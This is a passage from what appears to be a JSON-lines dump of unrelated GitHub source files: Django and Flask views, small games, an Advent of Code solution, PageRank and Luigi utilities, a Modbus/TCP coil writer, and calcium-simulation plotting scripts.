user_forms.cleaned_data.get('first_name'),\n 'last_name': user_forms.cleaned_data.get('last_name')\n })\n send_mail_to(request, subject='User Profile Update', from_email='no-reply@popcorn.com',\n recipient_list=[user_forms.cleaned_data.get('email')], html_message=html_message) # custom function returned send_mail\n\n return redirect('home_dashboard')\n else:\n # print out the error to the current form\n print(user_forms.errors)\n print(profile_forms.errors)\n user_forms = UpdateUserForm(instance=request.user)\n profile_forms = UpdateProfileForm(instance=user_profile_data)\n context = {'user_forms': user_forms, 'profile_forms': profile_forms, 'user_profile_data': user_profile_data}\n\n return render(request, 'account/profile/edit_user_profile.html', context)\n else: # thus a GET request\n user_forms = UpdateUserForm(instance=request.user)\n profile_forms = UpdateProfileForm(instance=user_profile_data)\n context = {'user_forms': user_forms, 'profile_forms': profile_forms, 'user_profile_data': user_profile_data}\n return render(request, 'account/profile/edit_user_profile.html', context)\n\n# def update_user_profile(request):\n# user_profile_data = UserProfile.objects.filter(userCreated=request.user).first()\n# if request.method == 'POST':\n# user_forms_update = UpdateUserForm(request.POST, instance=request.user)\n# userprofile_forms_update = UpdateProfileForm(request.POST, request.FILES)\n# if user_forms_update.is_valid() and userprofile_forms_update.is_valid():\n# user_forms_update.save()\n# userprofile_forms_update.save()\n# return HttpResponse('not working')\n# else:\n# print(user_forms_update.errors)\n# print(userprofile_forms_update.errors)\n# user_forms_update = UpdateUserForm(instance=request.user)\n# userprofile_forms_update = UpdateProfileForm()\n# context = {\n# 'user_forms_update': user_forms_update , 'userprofile_forms_update': userprofile_forms_update\n# }\n# return render(request, 'content/profile/edit_profile.html', context)\n# else:\n# user_forms_update = UpdateUserForm()\n# userprofile_forms_update = UpdateProfileForm()\n# return render(request, 'content/profile/edit_profile.html',\n# {'user_forms_update': user_forms_update},\n# {'userprofile_forms_update': userprofile_forms_update})\n\n # print(userprofile_forms_update)\n # return redirect('edit_userprofile')\n # print(user_forms_update)\n # print(userprofile_forms_update)\n # return HttpResponse('IT WORKED')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# class based views would be revisited later\n# class ProfileView(ListView):\n# # template_name = 'accounts/userprofile_list.html'\n# model = UserProfile\n# context_object_name = 'profile_list'\n# form = UpdateProfileForm\n#\n#\n# class UpdateUserProfile(ListView):\n# form_class = [UpdateUserForm(), UpdateProfileForm()]\n# model = [UserProfile, CustomUser]\n# template_name = 'account/update_profile_list.html'\n# context_object_name = {'form': form_class}\n\n\n\n","repo_name":"kwabenaG/popcorn_","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29211429007","text":"# miguel jusino\n# main player and all that I want to go with him through chapters\nfrom user import user\nfrom Chapter2 import ch2\nfrom Chapter3 import ch3\nfrom Chapter4 import ch4\nfrom Chapter5 import ch5\n\n\ndef ch1(user):\n # input(\"Press enter to start Chapter 1!\")\n\n print(\"You are dancing at a party. \")\n\n dance = input(\"Do you want to keep dancing? yes/no? \")\n # dance loop that is only allowed 3 entry\n dance_count = 0\n while dance.lower().strip() == \"yes\" and dance_count < 3:\n dance_count += 1\n print(\"more coins!\")\n user.coins += 5\n user.xp += 3\n user.wood = 0\n user.food = 0\n user.uinfo()\n\n dance = input(\"Continue dancing? yes/no? \")\n\n print(\"on to the next level\\n\\n\\n\")\n ch2(user)\n ch3(user)\n ch4(user)\n ch5(user)\n\n\nch1(user)\n","repo_name":"DripTill/Final_Project_Game","sub_path":"Chapter1.py","file_name":"Chapter1.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6716301138","text":"import pygame\nimport os\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600))\n\npygame.display.set_caption(\" PUBG \")\n\nicon = pygame.image.load(os.path.join(\".\",\"PUBG\\Images\\pubg.png\"))\npygame.display.set_icon(icon)\n\nhand_shoot = pygame.image.load(os.path.join(\".\",\"PUBG\\Images\\shoot.png\"))\nshootx = 350\nshooty = 470\nshoot_change = 0\n\ndef shooter(x, y):\n screen.blit(hand_shoot,(x, y))\n\nrunning = True\nwhile running:\n screen.fill((0, 75, 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n shoot_change = -0.3\n if event.key == pygame.K_RIGHT:\n shoot_change = 0.3\n \n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n shoot_change = 0 \n\n shootx += shoot_change \n\n # if(shootx > 0 and shootx < 747):\n # shooter(shootx, shooty)\n # else: \n # if shootx <= 0:\n # shooter(0,shooty)\n # shootx = 0\n # else:\n # shooter(746,shooty)\n # shootx = 746\n\n if shootx <= 0:\n shootx = 0\n elif shootx >= 736:\n shootx = 736\n\n shooter(shootx, shooty) \n\n pygame.display.update()","repo_name":"Nanishanan/Pygame","sub_path":"PUBG/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34459043258","text":"\"\"\"\nhttps://adventofcode.com/2017/day/9\n\"\"\"\nfrom base import base\n\n\nclass StateMachine:\n def _closeGroup(self):\n self.runningTotal += self.groupValue\n self.groupValue -= 1\n\n def _countGarbage(self):\n self.garbageCount += 1\n\n def _openGroup(self):\n self.groupValue += 1\n\n states = {'RUNNING': {'!': ('RUNNINGBANG', None), '<': ('GARBAGE', None),\n '{': ('RUNNING', _openGroup), '}': ('RUNNING', _closeGroup), '*': ('RUNNING', None)},\n 'GARBAGE': {'!': ('GARBAGEBANG', None), '>': ('RUNNING', None), '*': ('GARBAGE', _countGarbage)},\n 'GARBAGEBANG': {'*': ('GARBAGE', None)},\n 'RUNNINGBANG': {'*': ('RUNNING', None)}\n }\n\n def __init__(self, fileName=None):\n self.runningTotal = 0\n self.garbageCount = 0\n self.groupValue = 0\n self.state = 'RUNNING'\n if fileName:\n self.readStream(fileName)\n\n def inject(self, char):\n stateDict = self.states[self.state]\n if char in stateDict:\n self.state, stateFunc = stateDict[char]\n elif '*' in stateDict:\n self.state, stateFunc = stateDict['*']\n else:\n raise SyntaxError(\"Unrecognised char '{}' in <{}>\".format(char, self.state))\n\n if stateFunc:\n stateFunc(self)\n\n def readStream(self, fileName):\n for line in base.getInputLines(fileName):\n for char in line:\n self.inject(char)\n\n\nif __name__ == '__main__':\n sm = StateMachine(\"input2017_09a.txt\")\n print(\"Part 1: {}\".format(sm.runningTotal))\n print(\"Part 2: {}\".format(sm.garbageCount))\n","repo_name":"dcsparkes/adventofcode","sub_path":"_2017/d09_streamprocessing.py","file_name":"d09_streamprocessing.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18548236642","text":"import os\nfrom flask import Flask, render_template, request\nfrom dbActions import json_query\nimport requests\nimport json\n\napp = Flask(__name__)\n\n@app.route(\"/home\")\n@app.route(\"/\")\ndef index_page():\n return render_template('assignment11.html')\n\n@app.route(\"/assignment11/users\")\ndef assignment11_site():\n query = \"select * from users\"\n query_result = json_query(query=query)\n return json.dumps(query_result)\n\n@app.route(\"/assignment11/outer_source\")\ndef assignment11_outer_source():\n if len(request.args) > 0: # called from form submit (b.e)\n user_id = request.args['user_id']\n if user_id:\n user = requests.get(url=f\"https://reqres.in/api/users/{user_id}\")\n user_data = user.json()['data']\n return render_template(\"outer_form.html\", user = user_data)\n else:\n return render_template(\"outer_form.html\")\n else:\n return render_template(\"outer_form.html\")\n\n\nif __name__ == '__main__':\n # Bind to PORT if defined, otherwise default to 5000.\n port = int(os.environ.get('PORT', 5000))\n app.secret_key = '123'\n app.run(host='127.0.0.1', port=port)\n\n","repo_name":"mizaviv/assignment11arseni","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33531813800","text":"import sys\n\nimport configurations as conf\nimport pagerank_utils as pru\n\nfrom _functools import reduce\n\n\n\ndef _print_usage():\n\tusage='''Usage:\n\tpython WebIR_HW_2_part_3_online.py [--verbose]\nExample:\n\tpython WebIR_HW_2_part_3_online.py 3_4_0_1_1 --verbose'''\n\tprint(usage)\n\n\ndef main():\n\n\tif len(sys.argv)>=2 and len(sys.argv)<=3:\n\t\tpreference_vector = [int(pref) for pref in sys.argv[1].split('_')]\n\n\t\tif len(sys.argv)==3 and sys.argv[2]==\"--verbose\": verbose=True\n\telse:\n\t\t_print_usage()\n\t\texit(1)\n\n\t# the dictionary id2score for store the merged score\n\tmerged_scores = _recommend_movies_multi_category(preference_vector)\n\n\t# sort the merged_scores by score (descending)\n\tsorted_merged_scores = sorted(merged_scores.items(), key=lambda x: -x[1])\n\n\t# print on stdout\n\tpru.print_pagerank_list(sorted_merged_scores)\n\n\treturn sorted_merged_scores\n\n\ndef _recommend_movies_multi_category(preference_vector):\n\t# the dictionary id2score for store the merged score\n\tmerged_scores = {}\n\n\t# normalize preference_vector\n\tnorm = sum(preference_vector)\n\tnorm_preference_vector = [pref/norm for pref in preference_vector]\n\n\t# list of topic-based pageranks; we will combine them with the weights in input\n\t# enumerate categories from 1\n\t# for each category, load its topic-based pagerank\n\ttopic_based_pageranks = _load_precomputed_categories_pageranks(norm_preference_vector)\n\n\t# merge all the keys of the pagerank vectors (i.e.: all the involved movie_ids in the merge)\n\tids_union = set(reduce(lambda x, y: x.union(y), [set(d.keys()) for d in topic_based_pageranks]))\n\n\t# merge distribution works (it seems to...) also for pageranks ;)\n\t# Below the older version, before the implementation of \"merge_distributions\" used for part 4.\n\tmerged_scores = pru.merge_distributions(topic_based_pageranks, norm_preference_vector)\n\n\t# OLD VERSION\n\t# # for every id, sum its scores for every pagerank category (zero if that movie is not present)\n\t# for id in ids_union:\n\t# \t# for a single id:\n\t# \t# 1) iterate over the involved categories\n\t# \t# 2) for each category, compute its contribution (if present) for the current id, weighting that value\n\t# \t# 3) sum all the contributions\n\t# \tmerged_scores[id] = sum([norm_weight*cur_tbpr.get(id, 0) for (cur_tbpr, norm_weight) in zip(topic_based_pageranks, norm_preference_vector)])\n\n\treturn merged_scores\n\n\ndef _load_precomputed_categories_pageranks(norm_preference_vector):\n\tresult = []\n\tfor category_id in range(1, len(norm_preference_vector)+1):\n\t\tif norm_preference_vector[category_id-1]==0:\n\t\t\tresult.append({})\n\t\t\tcontinue\n\t\tCUR_CATEGORY_PAGERANK_FILEPATH = conf.PART_2_OUTPUT_DIR + conf.PART_2_PAGERANK_OUTPUT_FILENAME_FORMAT\n\t\tCUR_CATEGORY_PAGERANK_FILEPATH = CUR_CATEGORY_PAGERANK_FILEPATH.format(category_id)\n\n\t\tcur_pagerank_vector = pru.load_pagerank_vector_from_file(CUR_CATEGORY_PAGERANK_FILEPATH)\n\t\tresult.append(cur_pagerank_vector)\n\n\treturn result\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"WIR1617/wir-hw2","sub_path":"WebIR_HW_2_part_3_online.py","file_name":"WebIR_HW_2_part_3_online.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35144089421","text":"# -*- coding: utf-8 -*-\n\"\"\" This module supplements Luigi's atomic writing within its Target classes. \n The subclassed method preserves the suffix of the output target in the temporary file. \n \n\"\"\"\nimport io\nimport os\nimport random\nimport traceback\nfrom contextlib import contextmanager\n\nimport luigi\nfrom luigi.local_target import LocalTarget, atomic_file\nfrom luigi.format import FileWrapper, get_default_format\n\nclass suffix_preserving_atomic_file(atomic_file):\n\t\"\"\" This class provides the method to create the name of a temporary path, preserving the extension\n\t\"\"\"\n\tdef __init__(self, path=''):\n\t\tsuper().__init__(path)\n\t\n\tdef __enter__(self, path=''):\n\t\t\"\"\"Method to return itself \"\"\"\n\n\t\treturn self\n\t\t \n\tdef generate_tmp_path(self, path=''):\n\t\t\"\"\"Method to override atomic_file \"\"\"\n\n\t\tdirname, fname = os.path.split(path)\n\n\t\ttry:\n\t\t\tbasename, ext = fname.split('.', 1)\n\t\texcept ValueError:\n\t\t\text = ''\n\t \n\t\tself.__gen_tmppath = dirname + '/' + basename + '-luigi-tmp-%09d' % random.randrange(0, 1e10) + '.' + ext\n\n\t\treturn self.__gen_tmppath\n\nclass BaseAtomicProviderLocalTarget(LocalTarget):\n\t\"\"\"This provides the base atomic provider class with 2 methods:\n\t- open()\n\t- temporary_path()\n\t\"\"\"\n\n\t# Allow some composability of atomic handling\n\tatomic_provider = atomic_file\n\n\tdef __init__(self, path=None, format=None, is_tmp=False):\n\t\tif format is None:\n\t\t\tformat = get_default_format()\n\t\tsuper(LocalTarget, self).__init__(path)\n\t\tself.format = format\n\t\n\tdef open(self, mode='r'):\n\t\t# leverage super() \n\t\tmy_super = super(LocalTarget, self).__init__(self.path)\n\n\t\ttry:\n\t\t\t# Modify LocalTarget.open() to use atomic_provider rather than atomic_file\n\t\t\trwmode = mode.replace('b', '').replace('t', '')\n\t\t\tif rwmode == 'w':\n\t\t\t\tself.makedirs()\n\t\t\t\tipath = self.format.pipe_writer(self.atomic_provider(self.path))\n\t\t\t\treturn ipath\n\t\t\telif rwmode == 'r':\n\t\t\t\tfileobj = FileWrapper(io.BufferedReader(io.FileIO(self.path, mode)))\n\t\t\t\treturn self.format.pipe_reader(fileobj)\n\t\t\telse:\n\t\t\t\traise Exception(\"mode must be 'r' or 'w' (got: %s)\" % mode)\n\t\texcept Exception:\n\t\t\ttraceback.print_exc()\n\t\t\n\t@contextmanager\n\tdef temporary_path(self):\n\t\tlpath = self.path\n\t\tself.makedirs()\n\t\twith self.atomic_provider(lpath) as af:\n\t\t\tyield af.tmp_path\n\t\n\tdef xxtemporary_path(self):\n\t\t# Mock\n\t\tself.makedirs()\n\t\taf = self.atomic_provider(self.path) \n\t\treturn af\n\n\nclass SuffixPreservingLocalTarget(BaseAtomicProviderLocalTarget):\n\t\"\"\"This class returns the temporary path\n\t\"\"\"\n\n\t# Set atomic_provider to the suffix preserving method\n\tatomic_provider = suffix_preserving_atomic_file\n\n\n# UNIT TEST: To be removed\nif __name__ == \"__main__\": \n\tpass","repo_name":"nhvinh118/pset-4-5","sub_path":"src/pset_utils/luigi/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7695566138","text":"# -*- coding: utf-8 -*-\n#\n# Modbus/TCP writer\n#\nimport socket\nimport struct\nimport time\nimport traceback\nimport codecs\nimport sys\n\nTARGET_IP = '192.168.1.99'\ntry:\n TARGET_IP = sys.argv[1]\nexcept IndexError:\n pass # use defaults\n\nTARGET_PORT = 502\nbuffer_size = 0\n#SUPPORTED_FC = (0x05, 0x06)\n\n\ndef get_param(msg):\n param = input(msg)\n hex_dec = 16 if \"0x\" in param.lower() else 10\n return int(param, hex_dec)\n\ntry:\n print(\"\\nEnter Modbus Params in [0xnn (Hex)] or [nn (Dec)]\")\n unitId = get_param(\" Unit Identifier: \")\n functionCode = get_param(\" Function Code: \")\n #if functionCode not in SUPPORTED_FC:\n # raise Exception(\"FC only support {}\".format(SUPPORTED_FC))\n if functionCode == 0x05:\n startRegister = get_param(\" Start Register: \")\n pack_data = 0xff00 if get_param(\" On(1) or Off(0):\") == 1 else 0x0000\n numRegister = 2\n else:\n #raise Exception(\"FC only support {}\".format(SUPPORTED_FC))\n raise Exception(\"FC only support 0x05\")\n\n # Send request\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((TARGET_IP, TARGET_PORT))\n req = struct.pack('>3H 2B 2H', 0, 0, 6, unitId, functionCode, startRegister, pack_data)\n sock.send(req)\n\n # Receive response\n buffer_size = len(req)\n res = sock.recv(buffer_size)\n print(\"\\nTX: {0}\".format(codecs.encode(req, 'hex_codec')))\n print(\"RX: {0}\".format(codecs.encode(res, 'hex_codec')))\n\n if res == req:\n print(\"\\nOK, write completed.\")\n else:\n # error response\n s = struct.Struct('>3H 3B')\n data = s.unpack(res)\n print(\"\\nModbus Application Data Unit (ADU)\")\n print(\" Transaction Identifier : %s\" %data[0])\n print(\" Protocol Identifier : %s\" %data[1])\n print(\" Length : %s\" %data[2])\n print(\" Unit Identifier : %s\" %data[3])\n print(\" Error Code : 0x{0:02x} : {0}\".format(data[4]))\n print(\" Exception Code : 0x{0:02x} : {0}\".format(data[5]))\n\n sock.close()\nexcept:\n print(traceback.format_exc())\nfinally:\n print(\"\\nDone\")\n","repo_name":"tyamazoe/modbus","sub_path":"writer/modbus_writer.py","file_name":"modbus_writer.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1136541913","text":"from criteria import hoek_brown\r\nimport numpy as np\r\n\r\nfrom norm import norm_sigma\r\nfrom support import distance, angle\r\n\r\nif __name__ == '__main__':\r\n import matplotlib.pyplot as plt\r\n\r\n min_x = -1000\r\n max_x = 1000\r\n n = 1001\r\n hb_xs = np.linspace(min_x, max_x, n)\r\n hb_ys = [hoek_brown(x, x) for x in hb_xs]\r\n\r\n plt.plot(hb_xs, hb_ys)\r\n\r\n sigma = [-500, -500, -700]\r\n a = angle([1, 1, 0], [1, 0, 0])\r\n sigma_max_1 = hoek_brown(sigma[1], sigma[2])\r\n sigma_max = [sigma_max_1, sigma[1], sigma[2]]\r\n d = distance(sigma, sigma_max)\r\n sigma_n = norm_sigma(sigma)\r\n plt.scatter(sigma[2], sigma[0], c='red')\r\n plt.scatter(sigma_max[2], sigma_max[0], c='green')\r\n plt.scatter(sigma_n[2], sigma_n[0], c='blue')\r\n plt.plot([0, 0], [min_x, max_x], color='black', alpha=1, linewidth=0.5)\r\n plt.plot([min_x, max_x], [0, 0], color='black', alpha=1, linewidth=0.5)\r\n plt.xlim(min_x*1.05, max_x*1.05)\r\n plt.ylim(min_x*1.05, max_x*1.05)\r\n plt.show()\r\n","repo_name":"romanzes637/fc","sub_path":"hb2d.py","file_name":"hb2d.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35469757046","text":"import sys\nimport argparse\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt \nfrom lxml import etree\nimport utility_functions as utils\n\ncolors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:brown',\n 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan', \"b\", \"orange\", \"g\",\n \"r\", \"p\" ]\nstim_dend = \"dend26\"\ndend_f = {\n \"1.2\":\n [\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_1.2_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_1.2_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_1.2_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_1.2_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_1.2_um_50_um_4000_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_1.2_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_1.2_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_1.2_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_1.2_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_1.2_um_50_um_4000_nM.h5\", \n ],\n \"2.4\":\n [\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_2.4_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_2.4_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_2.4_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_2.4_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_2.4_um_50_um_4000_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_2.4_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_2.4_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_2.4_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_2.4_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_2.4_um_50_um_4000_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_2.4_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_2.4_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_2.4_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_2.4_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_2.4_um_50_um_4000_nM.h5\", \n \n ],\n \"6.0\":\n [\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_6.0_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_6.0_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_baloon_diam_6.0_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_6.0_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_baloon_diam_6.0_um_50_um_4000_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_6.0_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_6.0_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_tubes_diam_6.0_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_6.0_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_tubes_diam_6.0_um_50_um_4000_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_6.0_um_50_um_350_nM.h5\",\n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_6.0_um_50_um_700_nM.h5\", \n \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_6.0_um_50_um_1050_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_6.0_um_50_um_2000_nM.h5\", \n # \"model_RyR_3s_injection_simple_SERCA_nc_tubes_diam_6.0_um_50_um_4000_nM.h5\", \n ],\n}\nlabels = {\n \"1.2\":\n [\n \"dendritic membrane 350 nM\",\n \"dendritic membrane 700 nM\", \n \"dendritic membrane 1050 nM\", \n \"dendritic membrane 2000 nM\", \n \"dendritic membrane 4000 nM\",\n \"RyR2 uniform 350 nM\",\n \"RyR2 uniform 700 nM\", \n \"RyR2 uniform 1050 nM\", \n \"RyR2 uniform 2000 nM\", \n \"RyR2 uniform 4000 nM\", \n ],\n \"2.4\":\n [\n \"RyR2 dendritic membrane 350 nM\",\n \"RyR2 dendritic membrane 700 nM\", \n \"RyR2 dendritic membrane 1050 nM\", \n # \"RyR2 dendritic membrane 2000 nM\", \n # \"RyR2 dendritic membrane 4000 nM\",\n \"RyR2 uniform 350 nM\",\n \"RyR2 uniform 700 nM\", \n \"RyR2 uniform 1050 nM\", \n # \"RyR2 uniform 2000 nM\", \n # \"RyR2 uniform 4000 nM\",\n \"RyR2 overexpressiom 350 nM\",\n \"RyR2 overexpression 700 nM\", \n \"RyR2 overexpression 1050 nM\", \n # \"RyR2 overexpression 2000 nM\", \n # \"RyR2 overexpression 4000 nM\", \n ],\n \"6.0\":\n [\n \"RyR2 dendritic membrane 350 nM\",\n \"RyR2 dendritic membrane 700 nM\", \n \"RyR2 dendritic membrane 1050 nM\", \n # \"RyR2 dendritic membrane 2000 nM\", \n # \"RyR2 dendritic membrane 4000 nM\",\n \"RyR2 uniform 350 nM\",\n \"RyR2 uniform 700 nM\", \n \"RyR2 uniform 1050 nM\", \n # \"RyR2 uniform 2000 nM\", \n # \"RyR2 uniform 4000 nM\",\n \"RyR2 overexpression 350 nM\",\n \"RyR2 overexpression 700 nM\", \n \"RyR2 overexpression 1050 nM\", \n # \"RyR2 overexpression 2000 nM\", \n # \"RyR2 overexpression 4000 nM\", \n ],\n}\n \nNA = Avogadro*1e-23\nspecie_dict = {\n \"Ca\": [\"Ca\"],\n \"CaOut\": [\"CaOut\"],\n \"CaER\": [\"CaER\"],\n \"RyRO\": [\"RyRO1\", \"RyRO2\"],\n \"STIM_CaER\": [\"STIM_2CaER\"],\n \"Orai\": [\"OraiSTIM_4\", \"Orai2STIM_4\", \"Orai3STIM_4\"]\n}\nmultiplier = {\n \"Ca\": 1,\n \"CaOut\": 1,\n \"CaER\": 1,\n \"RyRO1\": 1,\n \"RyRO2\": 1,\n \"STIM_2CaER\": 1,\n \"OraiSTIM_4\": 1,\n \"Orai2STIM_4\": 2,\n \"Orai3STIM_4\": 3,\n}\n\ndef Parser():\n parser = argparse.ArgumentParser(description='Generate figs of avg conc')\n parser.add_argument('--species', default=\"Ca\",\n help='Ca, RyRO, CaER, CaOut, RyR')\n\n return parser\n\n \n\n\nif __name__ == '__main__':\n fnames = []\n args = Parser().parse_args()\n chosen_specie = args.species\n if chosen_specie in [\"Ca\", \"CaER\", \"CaOut\", \"RyRO\"]:\n output_name = \"all\"\n elif chosen_specie in [\"STIM_CaER\", \"Orai\"]:\n output_name = \"RyR_Orai\"\n\n try:\n specie_list = specie_dict[chosen_specie]\n except AttributeError:\n sys.exit(\"Unnkown specie %s\" % s)\n base = \"dend\"\n reg_list = [base, \"dend01\", \"dend02\", \"dend03\", \"dend04\", \"dend05\",\n \"dend06\", \"dend07\", \"dend08\", \"dend09\",]\n for i in range(10, 102, 1):\n reg_list.append(\"%s%d\" %(base, i))\n \n fig1, ax1 = plt.subplots(2, len(dend_f), figsize=(20, 10))\n\n \n im_list = {}\n for i, key in enumerate(dend_f.keys()):\n im_list[key] = []\n for j, fname in enumerate(dend_f[key]):\n try:\n my_file = h5py.File(fname, 'r')\n except FileNotFoundError:\n print(fname, \" not found\")\n continue\n conc_dict = {}\n time_dict = {}\n for trial in my_file.keys():\n if trial == \"model\":\n continue\n conc, voxels = utils.get_dynamics_in_region(my_file,\n specie_list,\n reg_list, trial, output_name)\n conc_dict[trial] = conc\n time = utils.get_times(my_file, trial, output_name)\n time_dict[trial] = time\n dt = time[1]-time[0]\n\n lmin = min([len(conc) for conc in conc_dict.values()])\n \n shape2 = max([conc.shape[1] for conc in conc_dict.values()])\n conc_mean = np.zeros((lmin, shape2))\n for conc in conc_dict.values():\n conc_mean[:lmin, :] += conc[:lmin, :]\n conc_mean /= len(conc_dict)\n conc_mean = (conc_mean - conc_mean[:2000].mean(axis=0))/conc_mean[:2000].mean(axis=0)\n im_list[key].append(conc_mean.T)#np.log10(1e-9*conc_mean.T))\n \n for j, conc in enumerate(im_list[key]):\n \n\n length = conc.shape[0]\n distance = [0]\n max_idx_seg_side1 = 50\n max_idx_seg_side2 = 51\n \n branch = [(conc[max_idx_seg_side1].max()\n +conc[max_idx_seg_side2].max())/2]\n delay = [(conc[max_idx_seg_side1, 3000:].argmax()\n +conc[max_idx_seg_side2, 3000:].argmax())/2*dt]\n max_pre = np.mean(conc[:, :3000].max(axis=1))\n for idx in range(1, 51):\n distance.append(idx/2)\n peak = (conc[max_idx_seg_side1-idx, 3000:].max()\n +conc[max_idx_seg_side2+idx, 3000:].max())/2\n branch.append(peak)\n \n if peak > 1:\n delay.append((conc[max_idx_seg_side1-idx, 3000:].argmax()\n +conc[max_idx_seg_side2+idx, 3000:].argmax())/2*dt)\n \n else:\n delay.append(0)\n \n ax1[0][i].plot(distance, branch, colors[j], marker = \"d\",\n label=labels[key][j])\n ax1[1][i].plot(distance, delay, colors[j], marker = \"d\",\n label=labels[key][j])\n \n # ax1[0][i].plot(distance, np.log10(np.ones_like(distance)*1e-7),\n # \"k\", label = \"100 nM\")\n #ax1[0][i].set_xlabel(\"Distance from stimulated site (um)\")\n ax1[0][0].set_ylabel(\"% basal calcium\", fontsize=15)\n ax1[0][i].set_title(\"%s um diameter\" % key, fontsize=15)\n \n ax1[1][i].set_xlabel(\"Distance from stimulated site (um)\", fontsize=15)\n ax1[1][0].set_ylabel(\"Ca wave delay (ms)\", fontsize=15)\n \n ax1[0][i].legend()\n \n\n for axes in ax1:\n ylim2 = max([max(ax.get_ylim()) for ax in axes])\n ylim1 = min([min(ax.get_ylim()) for ax in axes])\n for ax in axes:\n ax.set_ylim([ylim1, ylim2])\n fig1.savefig(\"Ca_wave_vs_distance_3s_injection.png\",\n bbox_inches=None, pad_inches=0.1)\n \n plt.show()\n \n","repo_name":"asiaszmek/stochastic_ER","sub_path":"scripts/make_distance_figs.py","file_name":"make_distance_figs.py","file_ext":"py","file_size_in_byte":10723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37095899704","text":"from datetime import datetime\nimport feedparser\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.http 